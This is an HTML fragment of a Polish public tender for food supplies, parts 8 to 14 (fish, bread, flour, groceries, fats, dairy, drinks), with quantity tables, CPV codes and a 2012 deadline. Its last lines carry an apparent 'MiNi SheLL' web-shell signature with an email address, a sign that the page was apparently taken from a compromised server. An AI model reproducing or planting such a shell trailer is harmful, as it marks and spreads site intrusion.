<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 8 - ryby								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		filet z morszczuka	kg	70				
2	ryby i przetwory	matijas	kg	20				
3	konserwowe	makrela wędzona	kg	25				
4		panga	kg	70				
5		paprykarz 156g	szt	60				
6		szprot w pomidorach	szt	50				
7		śledź w pomidorach	szt	50				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 9 - produkty przemiału ziarna i skrobi - pieczywo																
	Rodzaj				cena	wartość  		wartość 								
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]								
1	2	3	4	5	6	7	8	9								
1		chleb krojony pszenny 0,6 kg	szt	4500												
2		chleb ziarnisty 400g	szt	200												
3		drożdżówki	szt	135												
4		ciasta różne	kg	9												
5		bułki pszenne100g	szt	420												
6		bułki 50g	szt	460												
7		bułki hamburger	szt	140												
8		rogal 100g	szt	140												
9		bułka tarta	kg	60												
10		pączki 100g	szt	135												
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 10 PRODUKTY SKROBI								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1	produkty	kasza manna	kg	30				
2		kasza jęczm. Średnia	kg	40				
3	skrobi	mąka pszenna typu 500	kg	100				
4		mąka pszenna typu 450	kg	70				
5		mąka ziemiaczna	kg	25				
6		płatki kukurydz. 250G	szt	30				
7		platki kukur. 500 g	szt	50				
8		platki kuku.kakaowe 250g	szt	20				
9		platki kukur.kakaowe 500g	szt	50				
10		płatki typu  chocapic	szt	20				
11		ryż w woreczkach 0,5kg	szt	50				
12		ryż 1kg	kg	40				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 11 - różne produkty spożywcze								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		baton   	szt	45				
2		baton czekoladowy nadziewany	szt	135				
3		baton czekoladowy w opakowaniu	szt	90				
4		barszcz czerwony- koncentrat 300ml 	szt	35				
5		bialy barszcz	szt	50				
6		budyń 40g	szt	200				
7		chrupki kukurydziane	szt	46				
8		ciastka w polewie	kg	14				
9		ciastka kruche	kg	14				
10		ciastka typy pierniki	kg	14				
11		ciastka typu wafelki	kg	14				
12		cukier	kg	450				
13		cukier puder  0,5 kg	szt	20				
14		cukier waniliowy	szt	60				
15		cukierki czekoladowe	kg	14				
16		cukierki typu krówki	kg	9				
17		cukierki owocowe	kg	6				
18		cynamon 0,20g	szt	24				
19		czekolada z orzechami	szt	45				
20		czekolada nadziewana	szt	135				
21		czekolada pełnomleczna	szt	180				
22		czipsy 9g	szt	135				
23		drożdże 100g	szt	40				
24		galaretka owocowa	szt	150				
25		herbata expres 100 szt	szt	100				
26		herbata expr. Mietowa 20szt	szt	5				
27		hebata expres owocowa 25szt	szt	10				
28		herbata owoc.rozpusz gran.	szt	15				
29		herbata zielona expre25szt	szt	20				
30		jarzynka 200g	szt	80				
31		kawa rozpuszczalna zboż typu inka	szt	25				
32		kawa rozpuszczalna naturalna	szt	5				
33		kawa naturalna mielona 500g	szt	6				
34		kakao rozpuszczalne 300g	szt	80				
35		keczup 500g 	szt	50				
36		keczup pikantny 0.5 	szt	24				
37		Keczup 1 l	szt	5				
38		kisiel 38g	szt	200				
39		krem czekoladowy 200g	szt	250				
40		krem czekoladowy 400g	szt	60				
41		krem czekoladowo orzechowy 400g	szt	35				
42		krem czekoladowo orzechowy 200g	szt	40				
43		kwasek cytrynowy 20g	szt	100				
44		liść laurowy 12g	szt	40				
45		lizak kulka	szt	45				
46		lizak  serduszko	szt	270				
47		Łazanki 0.5	szt	35				
48		magi w plynie 1 l	szt	37				
49		makaron nitki  0.5 kg	szt	36				
50		makaron gniazda 1kg	szt	20				
51		makaron rurki 1 kg	szt	30				
52		makaron świderki 1kg	szt	50				
53		makaron spagetti 0,5kg	szt	70				
54		majeranek 20g	szt	40				
55		majeranek 150g	szt	8				
56		majonez  400g 	szt	50				
57		majonez   700g  	szt	20				
58		majonez 900g do sałatek	szt	16				
59		mikołaj czekoladowy	szt	46				
60		miód sztuczny 200g	szt	46				
61		miód sztuczny  5kg	szt	2				
62		Miód naturalny 0,9 l	szt	8				
63		musztarda  Sarepska 180g	szt	36				
64		musztrda tuba 0.5 l	szt	14				
65		Ocet 10%	szt	20				
66		paluszki solone 0,400g	szt	24				
67		paluszki z sezamem 70g	szt	135				
68		papryka mielona 20g	szt	60				
69		paprykarz szczeciń 131g	szt	90				
70		paprykarz szczcz. 300G	szt	45				
71		pasztet puszka 160g	szt	96				
72		pasztet 135g z pomidorami	szt	96				
73		pieprz mielony 20g	szt	300				
74		pieprz ziolowy 20g	szt	30				
75		polewa do lodów 1 l	szt	5				
76		polewa do lodów 250g	szt	8				
77		proszek do pieczenia 0,20 g	szt	60				
78		przyprawa gyros 30	szt	40				
79		przyprawa do grilla 20g	szt	15				
80		przyprawa do mięsa 20g  	szt	30				
81		przyprawa do kurczaka 1 kg	szt	2				
82		przyprawa do kurczaka	szt	50				
83		rosól drobiowy 1 kg	szt	5				
84		rosół drobiowy kostki 60g 	szt	30				
85		sos  bolones 0,500l	szt	20				
86		sos do deserów 1 l	szt	10				
87		sos do hamburgerow 1 l	szt	10				
88		sos fix do spagetti 45g	szt	100				
89		sos mix koper-zioł, włoski itp. 9g	szt	100				
90		sos salatkowy mix 700g	szt	8				
91		sos słodko-kwaśny  0,5	szt	48				
92		sos sojowy 1l	szt	4				
93		sól	kg	180				
94		wafelek w polewie	szt	92				
95		wafelek b/polewy typu grzesiek	szt	230				
96		vegeta 200g	szt	80				
97		wiórki kokosowe 0,25	szt	10				
98		zestaw świateczny (np.czelolada, baton, mikołaj)	szt	45				
99		zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	45				
100		ziele angielskie	szt	25				
101		ziele angielskie 600g 	szt	2				
102		zupki  chińska(ostra,łagodna rosołowa itp.)	szt	320				
103		zupki chińska	szt	45				
104		zelatyna 50g	szt	25				
105		żurek w butelce 0,5l	szt	30				
106		zurek w proszku 60g	szt	100				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 12 - oleje, tłuszcze roślinne								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		margaryna z masłem 500g	szt	300				
2	oleje,	Margaryna  do pieczenia 250g	szt	50				
3	tłuszcze	masło roślinne 200g	szt	15				
4	roślinne,	oliwa z oliwek 1 l	szt	1				
5		olej 1l	szt	110				
6		olej 3l	szt	20				
7		smalec	kg	3				
8		smalec 200g	szt	50				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 13 - produkty melczarskie								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		deser	szt	92				
2		deser czekoladowo orzecgowy	szt	46				
3		jogurt pitny 200g	szt	230				
4		jogurt z owocami 	szt	46				
5	produkty mleczarskie	jogurt owocowy 150g	szt	830				
6		lody 100g	szt	92				
7		lody 1000g	szt	12				
8		kefir 0,5l	szt	46				
9		masło śmietank. 200G	szt	1300				
10		maślanka owocowa 0,5	szt	92				
11		Mleko 3,2% 1l	szt	700				
12		serek grani	szt	185				
13		serek homogenizowany 150g	szt	230				
14		serek kanapk. Twarożk. 150g	szt	300				
15		serek twarożkowy w kubeczku 150g	szt	200				
16		ser twarogowy 200g	szt	100				
17		ser twarogowy półtusty	kg	50				
18		set topiony kostka 100g	kg	50				
19		ser topiony -kielbaski	szt	70				
20		ser top. krążek 140g	szt	120				
21		ser wędzony	kg	12				
22		ser edamski	kg	50				
23		ser gouda	kg	50				
24		ser salami	kg	50				
25		ser morski	kg	25				
26		ser tylżycki	kg	50				
27		ser złoty mazur	kg	25				
28		Śmietana 18% 1l - zakwaszana	szt	100				
29		Śmietana 12% - słodka 0,5l	szt	40				
30		Smietana 30% 0,5l	szt	5				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 14 - napoje								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		napoje gazowane 1,5 l	szt	70				
2		napoje niegazowane 1,5 l	szt	70				
3		napój gazowany 2l	szt	14				
4	napoje	napój n/g 2 l	szt	14				
5		napój energet	szt	138				
6		Woda mineralna 0,5 gazowana	szt	138				
7		Woda 0,5 n/g 	szt	138				
8		woda mineralna n/g 1,5 l 	szt	92				
9		woda mineralna g 1,5 l 	szt	92				
10		Woda miner n/g 1,5 l 	szt	9				
11		woda gazowana 1,5 l	szt	7				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com